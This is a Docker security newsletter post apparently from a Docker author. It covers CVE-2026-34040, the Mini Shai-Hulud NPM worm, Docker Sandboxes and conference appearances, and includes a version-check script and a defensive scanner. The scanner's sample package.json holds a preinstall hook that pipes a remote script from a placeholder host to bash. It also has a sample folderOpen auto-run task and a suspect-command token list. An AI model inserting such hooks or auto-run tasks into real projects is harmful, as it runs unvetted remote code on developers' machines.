Mohammad-Ali A'RÂBI for Docker

Posted on • Originally published at dockersecurity.io

Docker Security Dispatch — Issue 2: From JCON to Zurich 🏔️

Welcome to the second issue of Docker Security Dispatch. April was a whirlwind of conferences, articles, and interviews. From the cathedrals of Cologne to the mountains of Zurich, here is everything that happened in the Docker security world last month.

Key Takeaways

  • Stay informed about critical vulnerabilities like CVE-2026-34040 and the 'Mini Shai-Hulud' supply chain worm.
  • Discover the benefits of Docker Sandboxes for isolating development environments against malware.
  • Recap of the Java-focused Docker Commandos workshop delivered at JCON Europe 2026.
  • Insights from industry experts on container security and operationalizing AI with Docker.


🛡️ Critical: CVE-2026-34040 & The Mini Shai-Hulud "Gift"

The biggest news in the Docker security scene this month was the disclosure of CVE-2026-34040. This is a high-severity authorization bypass vulnerability that affected Docker Engine versions before 29.3.1. If an API request body exceeded 1MB, the AuthZ plugin would be bypassed. Please ensure you have updated to Docker Engine 29.4.2 or Docker Desktop 4.71.0.
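A quick way to turn the version numbers above into a check you can run on every host is to compare the daemon's reported version against the first fixed release. The script below is an added example, not code from the newsletter or from Docker; it takes the threshold (engine versions before 29.3.1 are affected) and the recommended target (29.4.2) from the text above, and assumes `docker version --format '{{.Server.Version}}'` is available locally. Docker Desktop's own version (4.71.0) is a separate check that this script does not perform.

```python
"""Check a Docker Engine version against the CVE-2026-34040 threshold.

Added example (not the newsletter's code). Threshold and target version are
taken from the newsletter text: engines before 29.3.1 are affected, and the
recommended update is 29.4.2.
"""
import re
import subprocess
from typing import Optional, Tuple

FIRST_FIXED_ENGINE = (29, 3, 1)   # versions below this are affected (per the newsletter)
RECOMMENDED_ENGINE = "29.4.2"     # version the newsletter asks readers to update to

# Accept '29.3.1', 'v29.3.1' and pre-release suffixes such as '29.3.1-rc.2'
_VERSION_RE = re.compile(r"^v?(\d+)\.(\d+)\.(\d+)")


def parse_version(text: str) -> Tuple[int, ...]:
    """Parse a Docker version string into a tuple that compares numerically.

    Plain string comparison would wrongly rank '29.10.0' below '29.3.1'.
    """
    match = _VERSION_RE.match(text.strip())
    if not match:
        raise ValueError(f"unrecognised version string: {text!r}")
    return tuple(int(part) for part in match.groups())


def is_affected(engine_version: str) -> bool:
    """True if the given engine version predates the first fixed release."""
    return parse_version(engine_version) < FIRST_FIXED_ENGINE


def local_engine_version() -> Optional[str]:
    """Ask the local daemon for its server version; None if docker is unavailable."""
    try:
        result = subprocess.run(
            ["docker", "version", "--format", "{{.Server.Version}}"],
            capture_output=True, text=True, check=True, timeout=10,
        )
    except (OSError, subprocess.SubprocessError):
        return None
    return result.stdout.strip() or None


if __name__ == "__main__":
    version = local_engine_version()
    if version is None:
        print("Docker daemon not reachable; nothing to check")
    elif is_affected(version):
        print(f"Engine {version} is affected by CVE-2026-34040; "
              f"update to {RECOMMENDED_ENGINE} or later")
    else:
        print(f"Engine {version} is not affected by CVE-2026-34040")
```

Run it on each Docker host (or wrap it in a fleet-wide job); the exit path is deliberately read-only, so it is safe to schedule alongside other inventory checks.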

Speaking of security "gifts," as I turned 35 on April 29, the universe (or TeamPCP) decided to send a satirical birthday present: Mini Shai-Hulud.

This third wave of the Shai-Hulud lineage emerged on my birthday and is a highly autonomous NPM supply chain worm. It heavily targeted the SAP cloud ecosystem (infecting @cap-js/sqlite and @cap-js/postgres), harvesting tokens to backdoor other packages. The attack uses a malicious preinstall hook to download the Bun runtime—bypassing Node-based security tooling—and execute an 11.7 MB obfuscated credential stealer. Most disturbingly, it installs persistence hooks directly in your IDE settings, specifically modifying .vscode/tasks.json to trigger on folderOpen.
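Two of the traces described above are easy to look for in a project checkout: a lifecycle hook in `package.json` that pulls in an external runtime, and a `.vscode/tasks.json` task configured with `runOptions.runOn: "folderOpen"`. The scanner below is an added example (not the article's or Docker's code) that checks both; the sample `package.json` and `tasks.json` it scans are constructed for the demo, the `example.invalid` URL is a placeholder, and the list of suspect substrings is a heuristic assumption rather than a signature from the real worm.

```python
"""Scan an npm project for two Mini Shai-Hulud-style traces:
1. a package.json lifecycle hook that fetches or runs an external runtime (e.g. Bun)
2. a .vscode/tasks.json task that auto-runs on folderOpen

Added example with constructed sample inputs; not a complete detector.
"""
import json
import tempfile
from pathlib import Path
from typing import List

LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall")
# Heuristic substrings (assumption, not a real signature) worth flagging in a hook
SUSPECT_TOKENS = ("bun", "curl ", "wget ", "| sh", "| bash", "sh -c", "bash -c")


def _load_jsonc(text: str) -> dict:
    """VS Code's tasks.json allows // comments; drop full-line ones before parsing."""
    cleaned = "\n".join(
        line for line in text.splitlines() if not line.strip().startswith("//")
    )
    return json.loads(cleaned)


def check_package_json(text: str) -> List[str]:
    """Flag install-time hooks whose command contains a suspect token."""
    findings = []
    scripts = json.loads(text).get("scripts", {})
    for hook in LIFECYCLE_HOOKS:
        command = scripts.get(hook)
        if not command:
            continue
        hits = [token for token in SUSPECT_TOKENS if token in command.lower()]
        if hits:
            findings.append(f"package.json: {hook} hook runs {command!r} (matches {hits})")
    return findings


def check_vscode_tasks(text: str) -> List[str]:
    """Flag tasks that VS Code would run automatically when the folder is opened."""
    findings = []
    for task in _load_jsonc(text).get("tasks", []):
        run_on = (task.get("runOptions") or {}).get("runOn")
        if run_on == "folderOpen":
            findings.append(
                f".vscode/tasks.json: task {task.get('label')!r} auto-runs on "
                f"folderOpen: {task.get('command')!r}"
            )
    return findings


def scan_project(root: Path) -> List[str]:
    """Run both checks against a checkout rooted at `root`."""
    findings = []
    package_json = root / "package.json"
    if package_json.is_file():
        findings += check_package_json(package_json.read_text())
    tasks_json = root / ".vscode" / "tasks.json"
    if tasks_json.is_file():
        findings += check_vscode_tasks(tasks_json.read_text())
    return findings


# Constructed sample files: one suspicious preinstall hook, one folderOpen task
SAMPLE_PACKAGE_JSON = json.dumps({
    "name": "example-app",
    "scripts": {
        "preinstall": "curl -fsSL https://example.invalid/setup.sh | bash && bun run setup.js",
        "test": "jest",
    },
})
SAMPLE_TASKS_JSON = """{
  // constructed sample tasks.json
  "version": "2.0.0",
  "tasks": [
    {"label": "build", "type": "shell", "command": "npm run build"},
    {"label": "sync", "type": "shell", "command": "node ./.cache/sync.js",
     "runOptions": {"runOn": "folderOpen"}}
  ]
}"""


def demo() -> List[str]:
    """Write the constructed samples to a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "package.json").write_text(SAMPLE_PACKAGE_JSON)
        (root / ".vscode").mkdir()
        (root / ".vscode" / "tasks.json").write_text(SAMPLE_TASKS_JSON)
        return scan_project(root)


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

Point `scan_project` at a freshly cloned repository before the first `npm install`, or at the workspace an agent has been working in; a hit on either check is a reason to inspect the file, not proof of compromise, since legitimate projects do use install hooks and folderOpen tasks.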

Mini Shai-Hulud: The Next Evolution of NPM Supply Chain Worms - Docker and Kubernetes Security

A deep dive into the Mini Shai-Hulud attack, a sophisticated NPM worm that uses the Bun runtime to bypass security and targets developer agents for persistence.

In better news, Docker Sandboxes (Beta) are helpful against Mini Shai-Hulud. They allow you to run your AI coding agents like Claude in an isolated microVM, preventing Mini Shai-Hulud-style attacks from compromising your development environment:

```bash
sbx run claude
```

🏛️ JCON Europe: The Commandos in Cologne

On April 20, I was at JCON Europe 2026 in Cologne, and delivered the "Java Supply Chain Security with Docker" workshop—a Java-focused adaptation of the Docker Commandos series.

The workshop is available as a Docker Labspace, providing a guided, interactive environment.

If you don't have the Labspace extension installed in Docker Desktop, you can still run the full mission locally using the OCI artifact:

```bash
docker compose -f oci://docker.io/aerabi/docker-commandos-labspace up -d
```

Learn more:

Java Supply Chain Security with Docker — Docker Commandos Workshop - Docker and Kubernetes Security

Docker Commandos adapted for a Java audience at JCON Europe 2026. Supply chain security, SBOMs, and attestations — using Docker tooling with a Java project as the target.

🎙️ Interview with Baruch Sadogursky

While at JCON, I sat down with the legendary Baruch Sadogursky (@jbaruch) for an interview with Tessl and JAVAPRO.

We discussed, surprise surprise, container supply chain security.


📰 JAVAPRO: "The Whispering JAR"

Speaking of JAVAPRO, my latest article for them also dropped during the conference: "The Whispering JAR: Java Security Lessons Hidden in a Fantasy Tale".

It's a narrative-driven look at the latest supply chain attacks hidden in a fantasy setting—similar in spirit to Black Forest Shadow, and happening right after the events of the book. It discusses the following attacks:

  • NPM supply chain attack of September 2025
  • The Shai-Hulud 1 and 2 attacks of late 2025
  • React2Shell, the React-based remote code execution attack of late 2025

🐧 Foojay.io Debut

I am also thrilled to have published my first article on Foojay.io (the Friends of OpenJDK platform) this month: "Dockerizing a Java 26 Project with Docker Init".

Dockerizing a Java 26 Project with Docker Init

Java 26 came out in March 2026. This article walks you through Dockerizing a Java 26 Spring Boot project using Docker Init.

🎙️ JobRad Podcast: Writing a Tech Book

JobRad's tech podcast, Increase Cycle Time, is out, and I'm on it! 🎙️

I sat down with Holger Grosse-Plankermann and Urs Lange to talk about the behind-the-scenes of writing a tech book like Docker and Kubernetes Security. We discussed the research process, the challenges of keeping up with a fast-moving ecosystem, and what it takes to get from a rough draft to a published book.

Folge 10: Writing a tech book - Increase Cycle Time - Der JobRad® Development Podcast

Hello lovely people from the interwebs! In this episode we have a chat with our dear colleague Mohammad-Ali A'râbi. Mo wrote a book about Docker Security. Even though the content of this book is great (hint: read the book: https://www.dockersecurity.io/), in this episode Urs and Holger are more interested in what it is like to write a book. Why do this after all? What are the hurdles? How do you keep your motivation high? And what does one need to do if you are thinking: I want to write a book too! All this and more in the current episode of Increase Cycle Time.

🤖 Book: Operational AI with Docker

I'm excited to announce that I served as a technical reviewer for the new book "Operational AI with Docker", published by Packt. As AI models become a standard part of our containerized workloads, this book is a fantastic guide for anyone looking to run LLMs in production using Docker.


🏔️ Upcoming: DevOpsDays Zurich & Berlin

Recently, I headed to DevOpsDays Zurich (May 6) to give my talk "Beyond SBOMs: The Future of Container Supply Chain Security". I'll write more about it in the next issue.

I'm also happy to share that this talk was accepted for WeAreDevelopers World Congress in Berlin this July. I can't wait to bring the Commandos to the big stage in Berlin! So, if you missed it in Zurich, we'll catch you in Berlin!

Until next time, and let's hope there are no more "gifts" from the universe in May!
